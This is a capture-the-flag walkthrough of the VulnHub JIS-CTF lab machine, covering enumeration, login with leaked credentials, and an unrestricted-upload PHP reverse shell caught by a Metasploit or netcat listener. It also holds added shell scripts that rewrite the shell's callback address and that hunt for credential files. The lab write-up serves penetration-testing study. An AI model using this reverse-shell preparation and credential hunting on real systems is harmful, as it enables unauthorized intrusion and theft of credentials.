CTF Solution: JIS-CTF

Link to the VirtualBox download: https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/

Goal: 5 flags

Step 1: Loading my Kali and the CTF on VirtualBox.
I chose to put both on their own subnet.

Kali IP: 192.168.56.102

Step 2: Discovering CTF IP
netdiscover

CTF IP is 192.168.56.101

Step 3: Enumerating with nmap

nmap -Pn -p- -sV 192.168.56.101

Open ports:

22 ssh

80 http

Step 4: Scanning the web server

dirb http://192.168.56.101

Lots of files and directories there: let’s explore them one by one…

Step 5: Exploring /admin_area/

This is the page-

And the source shows-

That’s the second flag, sitting in an HTML comment – so I’ve probably missed something even more obvious, right in my face!

Flag: 7412574125871236547895214

Found: #2

Looking for: #1, #3, #4, and #5

and the same source also leaks the admin credentials: username admin, password 3v1l_H@ck3r

We’ll make a note of that and return to it in time…

Step 6: Exploring /flag/

Yes, I probably should have come here first – it is called “flag”!

Flag: 8734509128730458630012095

Found: #1, #2

Looking for: #3, #4, and #5

Step 7: Exploring /robots.txt

I systematically tried loading each path it lists – but nothing new showed up.

Step 8: Exploring /index.php

It redirects to /login.php

And yes, we can login with the creds found in Step 5

username: admin 

password: 3v1l_H@ck3r

and we’re in-

The Browse button accepts a file of any type (no extension or content check), so let’s try uploading a PHP reverse shell, shall we?

Step 9: Uploading a php reverse shell

Kali ships a set of web shells in-

/usr/share/webshells

I changed the IP and port in php-reverse-shell.php to my Kali box and the listener port (192.168.56.102 and 55555, the values used in Step 10)-

And uploaded it successfully.

Step 10: Exploitation – firing up Metasploit

use multi/handler

set payload linux/x86/shell/reverse_tcp

set LHOST 192.168.56.102

set LPORT 55555

exploit

(php-reverse-shell.php is a plain, unstaged shell: it just connects /bin/sh to the socket. The exact match is therefore a non-staged handler payload such as linux/x86/shell_reverse_tcp, or simply nc -lvnp 55555; the staged payload above still caught the callback here.)

Then browsing to /uploaded_files/php-reverse-shell.php triggers the script-

and yes, Metasploit gave us a shell!
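Steps 9 and 10 are the manual version of a routine that every web-shell upload follows: copy the shell, point it at your listener, check the result, upload, start the listener, trigger. The script below is an added example (mine, not part of the original walkthrough or of the pentestmonkey shell) that does the edit-and-check part in POSIX sh. It assumes only that the shell carries the two placeholder lines that php-reverse-shell.php has (`$ip = '127.0.0.1';` and `$port = 1234;`, each marked `// CHANGE THIS`); the sample file the demo writes is a constructed stand-in for those lines, and the host and port are the ones used above.

```sh
#!/bin/sh
# Added example: prepare a copy of php-reverse-shell.php for upload.
# Assumes the file carries pentestmonkey's two placeholder lines:
#   $ip = '127.0.0.1';  // CHANGE THIS
#   $port = 1234;       // CHANGE THIS

# prepare_shell SRC DEST LHOST LPORT
# Copy SRC to DEST with $ip/$port rewritten to LHOST/LPORT.
# Fails (exit 1) when either placeholder line is missing, so a wrong
# or already-edited file is noticed before it is uploaded.
prepare_shell() {
    src=$1
    dest=$2
    lhost=$3
    lport=$4
    grep -q "^[\$]ip = '" "$src" || return 1
    grep -q "^[\$]port = " "$src" || return 1
    sed -e "s/^[\$]ip = '[^']*';/\$ip = '$lhost';/" \
        -e "s/^[\$]port = [0-9]*;/\$port = $lport;/" "$src" > "$dest"
}

# shell_target FILE: print the "ip:port" the shell will call back to,
# as a last check before uploading.
shell_target() {
    ip=$(sed -n "s/^[\$]ip = '\([^']*\)';.*/\1/p" "$1")
    port=$(sed -n "s/^[\$]port = \([0-9]*\);.*/\1/p" "$1")
    printf '%s:%s\n' "$ip" "$port"
}

# Demo on a constructed stand-in for the real file
# (/usr/share/webshells/php-reverse-shell.php on Kali).
demo() {
    tmp=$(mktemp -d)
    printf '%s\n' '<?php' \
        "\$ip = '127.0.0.1';  // CHANGE THIS" \
        "\$port = 1234;       // CHANGE THIS" > "$tmp/php-reverse-shell.php"
    prepare_shell "$tmp/php-reverse-shell.php" "$tmp/upload.php" 192.168.56.102 55555
    shell_target "$tmp/upload.php"      # 192.168.56.102:55555
    rm -rf "$tmp"
}
demo
# Start the listener before browsing to the uploaded file:  nc -lvnp 55555
```

The placeholder check matters more than it looks: the classic failure with this shell is uploading a copy that still points at 127.0.0.1:1234 and then waiting on a listener that never fires.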

lots of cd and ls commands, and finally-

cat flag.txt doesn’t work (the web server’s user isn’t allowed to read it)

But cat hint.txt does!

We have our third flag-

Flag: 7645110034526579012345670

Found: #1, #2, #3

Looking for: #4 and #5

and we have a hint:

Try to find user technawi password to read the flag.txt file, you can find it in a hidden file 😉

Step 11: Hunting for technawi’s hidden file

After a lot of trial and error with grep, trying to use the hint and find technawi’s hidden file, I hit gold with-

$ find / -user technawi -type f 2>&1 | grep -v "Permission" | grep -v "No such"

(2>/dev/null after the find would discard those error lines in one go instead of filtering them with grep -v.)
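The find above is one of three searches a practitioner runs at this point, with a low-privilege shell and a hint about a hidden file: files owned by the target user, dotfiles, and text files that mention passwords or flags. The script below is an added example (mine, not from the walkthrough) that bundles the three in POSIX sh, with errors sent to /dev/null rather than filtered with grep -v. The functions take the search root as an argument so they can be tried on a throwaway directory; the demo’s file tree is constructed and merely stands in for the real filesystem, where the call would be hunt technawi /.

```sh
#!/bin/sh
# Added example: the three searches behind the "hidden file" hint,
# run from a low-privilege shell. Errors (Permission denied, etc.)
# go to /dev/null rather than being filtered out with grep -v.

# files_owned_by USER ROOT: regular files under ROOT owned by USER (name or uid).
files_owned_by() {
    find "$2" -user "$1" -type f 2>/dev/null
}

# hidden_files ROOT: regular files whose own name starts with a dot.
hidden_files() {
    find "$1" -type f -name '.*' 2>/dev/null
}

# cred_hits ROOT: text files mentioning "password" or "flag" (case-insensitive);
# -I skips binaries, -l prints only the file names.
cred_hits() {
    grep -rIil -e password -e flag "$1" 2>/dev/null
}

# hunt USER ROOT: run all three searches with labelled output.
hunt() {
    printf '== owned by %s ==\n' "$1"
    files_owned_by "$1" "$2"
    printf '== hidden files ==\n'
    hidden_files "$2"
    printf '== password/flag mentions ==\n'
    cred_hits "$2"
}

# Demo on a constructed tree standing in for the real filesystem.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/etc/app" "$tmp/home/user"
    printf 'username : technawi\npassword : notTheRealOne\n' > "$tmp/etc/app/credentials.txt"
    printf 'hello\n' > "$tmp/home/user/notes.txt"
    printf 'PATH=/usr/bin\n' > "$tmp/home/user/.profile"
    hunt "$(id -u)" "$tmp"
    rm -rf "$tmp"
}
demo
```

On the real box, the owner search is the one that pays off because the credentials file is owned by technawi; the keyword search is the fallback when the hint says nothing about an owner.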

Step 12: Inspecting /etc/mysql/conf.d/credentials.txt

cat /etc/mysql/conf.d/credentials.txt

Our fourth flag-

Flag: 7845658974123568974185412

Found: #1, #2, #3, #4

Looking for: #5

and the credentials needed to read flag.txt, which presumably holds the fifth and last flag:

username: technawi

password: 3vilH@ksor

Step 13: SSH as technawi

Step 3 had shown port 22 (SSH) open, so:

ssh technawi@192.168.56.101

password: 3vilH@ksor

lets us in!

Step 14: Inspecting /var/www/html/flag.txt

cat /var/www/html/flag.txt

And yes, our fifth and final flag!

Flag: 5473215946785213456975249

Found: #1, #2, #3, #4, #5

All done!

If there’s one thing this CTF taught me => I definitely need to brush up on my grep!

Tools and commands used-

  • netdiscover
  • nmap
  • dirb
  • php reverse shell
  • metasploit
  • find and grep
  • ssh